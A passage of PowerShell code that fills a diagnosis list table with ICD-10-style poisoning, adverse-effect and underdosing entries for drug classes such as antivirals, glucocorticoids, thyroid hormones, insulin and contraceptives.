by antiviral drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, assault","Poisoning by antiviral drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, undetermined","Poisoning by antiviral drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, undetermined","Poisoning by antiviral drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiviral drugs, undetermined","Poisoning by antiviral drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiviral drugs","Adverse effect of antiviral drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiviral drugs","Adverse effect of antiviral drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiviral drugs","Adverse effect of antiviral drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antiviral drugs","Underdosing of antiviral drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antiviral drugs","Underdosing of antiviral drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antiviral drugs","Underdosing of antiviral drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, accidental (unintentional)","Poisoning by other specified systemic anti-infectives and antiparasitics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, accidental (unintentional)","Poisoning by other specified systemic anti-infectives and antiparasitics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, accidental (unintentional)","Poisoning by other specified systemic anti-infectives and antiparasitics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, intentional self-harm","Poisoning by other specified systemic anti-infectives and antiparasitics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, intentional self-harm","Poisoning by other specified systemic anti-infectives and antiparasitics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, intentional self-harm","Poisoning by other specified systemic anti-infectives and antiparasitics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, assault","Poisoning by other specified systemic anti-infectives and antiparasitics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, assault","Poisoning by other specified systemic anti-infectives and antiparasitics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, assault","Poisoning by other specified systemic anti-infectives and antiparasitics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, undetermined","Poisoning by other specified systemic anti-infectives and antiparasitics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, undetermined","Poisoning by other specified systemic anti-infectives and antiparasitics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other specified systemic anti-infectives and antiparasitics, undetermined","Poisoning by other specified systemic anti-infectives and antiparasitics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other specified systemic anti-infectives and antiparasitics","Adverse effect of other specified systemic anti-infectives and antiparasitics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other specified systemic anti-infectives and antiparasitics","Adverse effect of other specified systemic anti-infectives and antiparasitics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other specified systemic anti-infectives and antiparasitics","Adverse effect of other specified systemic anti-infectives and antiparasitics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other specified systemic anti-infectives and antiparasitics","Underdosing of other specified systemic anti-infectives and antiparasitics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other specified systemic anti-infectives and antiparasitics","Underdosing of other specified systemic anti-infectives and antiparasitics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other specified systemic anti-infectives and antiparasitics","Underdosing of other specified systemic anti-infectives and antiparasitics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, accidental (unintentional)","Poisoning by unspecified systemic anti-infective and antiparasitics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, accidental (unintentional)","Poisoning by unspecified systemic anti-infective and antiparasitics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, accidental (unintentional)","Poisoning by unspecified systemic anti-infective and antiparasitics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, intentional self-harm","Poisoning by unspecified systemic anti-infective and antiparasitics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, intentional self-harm","Poisoning by unspecified systemic anti-infective and antiparasitics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, intentional self-harm","Poisoning by unspecified systemic anti-infective and antiparasitics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, assault","Poisoning by unspecified systemic anti-infective and antiparasitics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, assault","Poisoning by unspecified systemic anti-infective and antiparasitics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, assault","Poisoning by unspecified systemic anti-infective and antiparasitics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, undetermined","Poisoning by unspecified systemic anti-infective and antiparasitics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, undetermined","Poisoning by unspecified systemic anti-infective and antiparasitics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified systemic anti-infective and antiparasitics, undetermined","Poisoning by unspecified systemic anti-infective and antiparasitics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified systemic anti-infective and antiparasitic","Adverse effect of unspecified systemic anti-infective and antiparasitic, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified systemic anti-infective and antiparasitic","Adverse effect of unspecified systemic anti-infective and antiparasitic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified systemic anti-infective and antiparasitic","Adverse effect of unspecified systemic anti-infective and antiparasitic, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified systemic anti-infectives and antiparasitics","Underdosing of unspecified systemic anti-infectives and antiparasitics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified systemic anti-infectives and antiparasitics","Underdosing of unspecified systemic anti-infectives and antiparasitics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified systemic anti-infectives and antiparasitics","Underdosing of unspecified systemic anti-infectives and antiparasitics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, accidental (unintentional)","Poisoning by glucocorticoids and synthetic analogues, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, accidental (unintentional)","Poisoning by glucocorticoids and synthetic analogues, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, accidental (unintentional)","Poisoning by glucocorticoids and synthetic analogues, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, intentional self-harm","Poisoning by glucocorticoids and synthetic analogues, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, intentional self-harm","Poisoning by glucocorticoids and synthetic analogues, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, intentional self-harm","Poisoning by glucocorticoids and synthetic analogues, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, assault","Poisoning by glucocorticoids and synthetic analogues, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, assault","Poisoning by glucocorticoids and synthetic analogues, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, assault","Poisoning by glucocorticoids and synthetic analogues, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, undetermined","Poisoning by glucocorticoids and synthetic analogues, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, undetermined","Poisoning by glucocorticoids and synthetic analogues, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by glucocorticoids and synthetic analogues, undetermined","Poisoning by glucocorticoids and synthetic analogues, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of glucocorticoids and synthetic analogues","Adverse effect of glucocorticoids and synthetic analogues, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of glucocorticoids and synthetic analogues","Adverse effect of glucocorticoids and synthetic analogues, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of glucocorticoids and synthetic analogues","Adverse effect of glucocorticoids and synthetic analogues, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of glucocorticoids and synthetic analogues","Underdosing of glucocorticoids and synthetic analogues, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of glucocorticoids and synthetic analogues","Underdosing of glucocorticoids and synthetic analogues, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of glucocorticoids and synthetic analogues","Underdosing of glucocorticoids and synthetic analogues, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, accidental (unintentional)","Poisoning by thyroid hormones and substitutes, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, accidental (unintentional)","Poisoning by thyroid hormones and substitutes, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, accidental (unintentional)","Poisoning by thyroid hormones and substitutes, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, intentional self-harm","Poisoning by thyroid hormones and substitutes, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, intentional self-harm","Poisoning by thyroid hormones and substitutes, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, intentional self-harm","Poisoning by thyroid hormones and substitutes, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, assault","Poisoning by thyroid hormones and substitutes, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, assault","Poisoning by thyroid hormones and substitutes, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, assault","Poisoning by thyroid hormones and substitutes, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, undetermined","Poisoning by thyroid hormones and substitutes, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, undetermined","Poisoning by thyroid hormones and substitutes, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by thyroid hormones and substitutes, undetermined","Poisoning by thyroid hormones and substitutes, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of thyroid hormones and substitutes","Adverse effect of thyroid hormones and substitutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of thyroid hormones and substitutes","Adverse effect of thyroid hormones and substitutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of thyroid hormones and substitutes","Adverse effect of thyroid hormones and substitutes, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of thyroid hormones and substitutes","Underdosing of thyroid hormones and substitutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of thyroid hormones and substitutes","Underdosing of thyroid hormones and substitutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of thyroid hormones and substitutes","Underdosing of thyroid hormones and substitutes, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, accidental (unintentional)","Poisoning by antithyroid drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, accidental (unintentional)","Poisoning by antithyroid drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, accidental (unintentional)","Poisoning by antithyroid drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, intentional self-harm","Poisoning by antithyroid drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, intentional self-harm","Poisoning by antithyroid drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, intentional self-harm","Poisoning by antithyroid drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, assault","Poisoning by antithyroid drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, assault","Poisoning by antithyroid drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, assault","Poisoning by antithyroid drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, undetermined","Poisoning by antithyroid drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, undetermined","Poisoning by antithyroid drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antithyroid drugs, undetermined","Poisoning by antithyroid drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antithyroid drugs","Adverse effect of antithyroid drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antithyroid drugs","Adverse effect of antithyroid drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antithyroid drugs","Adverse effect of antithyroid drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antithyroid drugs","Underdosing of antithyroid drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antithyroid drugs","Underdosing of antithyroid drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antithyroid drugs","Underdosing of antithyroid drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, accidental (unintentional)","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, accidental (unintentional)","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, accidental (unintentional)","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, intentional self-harm","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, intentional self-harm","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, intentional self-harm","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, assault","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, assault","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, assault","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, undetermined","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, undetermined","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, undetermined","Poisoning by insulin and oral hypoglycemic [antidiabetic] drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of insulin and oral hypoglycemic [antidiabetic] drugs","Adverse effect of insulin and oral hypoglycemic [antidiabetic] drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of insulin and oral hypoglycemic [antidiabetic] drugs","Adverse effect of insulin and oral hypoglycemic [antidiabetic] drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of insulin and oral hypoglycemic [antidiabetic] drugs","Adverse effect of insulin and oral hypoglycemic [antidiabetic] drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of insulin and oral hypoglycemic [antidiabetic] drugs","Underdosing of insulin and oral hypoglycemic [antidiabetic] drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of insulin and oral hypoglycemic [antidiabetic] drugs","Underdosing of insulin and oral hypoglycemic [antidiabetic] drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of insulin and oral hypoglycemic [antidiabetic] drugs","Underdosing of insulin and oral hypoglycemic [antidiabetic] drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, accidental (unintentional)","Poisoning by oral contraceptives, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, accidental (unintentional)","Poisoning by oral contraceptives, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, accidental (unintentional)","Poisoning by oral contraceptives, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, intentional self-harm","Poisoning by oral contraceptives, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, intentional self-harm","Poisoning by oral contraceptives, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, intentional self-harm","Poisoning by oral contraceptives, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, assault","Poisoning by oral contraceptives, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, assault","Poisoning by oral contraceptives, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, assault","Poisoning by oral contraceptives, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, undetermined","Poisoning by oral contraceptives, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, undetermined","Poisoning by oral contraceptives, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oral contraceptives, undetermined","Poisoning by oral contraceptives, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of oral contraceptives","Adverse effect of oral contraceptives, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of oral contraceptives","Adverse effect of oral contraceptives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of oral contraceptives","Adverse effect of oral contraceptives, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of oral contraceptives","Underdosing of oral contraceptives, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of oral contraceptives","Underdosing of oral contraceptives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of oral contraceptives","Underdosing of oral contraceptives, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, accidental (unintentional)","Poisoning by other estrogens and progestogens, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, accidental (unintentional)","Poisoning by other estrogens and progestogens, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, accidental (unintentional)","Poisoning by other estrogens and progestogens, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, intentional self-harm","Poisoning by other estrogens and progestogens, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, intentional self-harm","Poisoning by other estrogens and progestogens, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, intentional self-harm","Poisoning by other estrogens and progestogens, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, assault","Poisoning by other estrogens and progestogens, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, assault","Poisoning by other estrogens and progestogens, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, assault","Poisoning by other estrogens and progestogens, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, undetermined","Poisoning by other estrogens and progestogens, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, undetermined","Poisoning by other estrogens and progestogens, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other estrogens and progestogens, undetermined","Poisoning by other estrogens and progestogens, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other estrogens and progestogens","Adverse effect of other estrogens and progestogens, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other estrogens and progestogens","Adverse effect of other estrogens and progestogens, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other estrogens and progestogens","Adverse effect of other estrogens and progestogens, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other estrogens and progestogens","Underdosing of other estrogens and progestogens, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other estrogens and progestogens","Underdosing of other estrogens and progestogens, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other estrogens and progestogens","Underdosing of other estrogens and progestogens, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, accidental (unintentional)","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, accidental (unintentional)","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, accidental (unintentional)","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, intentional self-harm","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, intentional self-harm","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, intentional self-harm","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, assault","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, assault","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, assault","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, undetermined","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, undetermined","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, undetermined","Poisoning by antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified","Adverse effect of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified","Adverse effect of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified","Adverse effect of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified","Underdosing of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified","Underdosing of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified","Underdosing of antigonadotrophins, antiestrogens, antiandrogens, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, accidental (unintentional)","Poisoning by androgens and anabolic congeners, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, accidental (unintentional)","Poisoning by androgens and anabolic congeners, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, accidental (unintentional)","Poisoning by androgens and anabolic congeners, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, intentional self-harm","Poisoning by androgens and anabolic congeners, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, intentional self-harm","Poisoning by androgens and anabolic congeners, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, intentional self-harm","Poisoning by androgens and anabolic congeners, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, assault","Poisoning by androgens and anabolic congeners, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, assault","Poisoning by androgens and anabolic congeners, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, assault","Poisoning by androgens and anabolic congeners, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, undetermined","Poisoning by androgens and anabolic congeners, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, undetermined","Poisoning by androgens and anabolic congeners, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by androgens and anabolic congeners, undetermined","Poisoning by androgens and anabolic congeners, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of androgens and anabolic congeners","Adverse effect of androgens and anabolic congeners, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of androgens and anabolic congeners","Adverse effect of androgens and anabolic congeners, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of androgens and anabolic congeners","Adverse effect of androgens and anabolic congeners, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of androgens and anabolic congeners","Underdosing of androgens and anabolic congeners, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of androgens and anabolic congeners","Underdosing of androgens and anabolic congeners, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of androgens and anabolic congeners","Underdosing of androgens 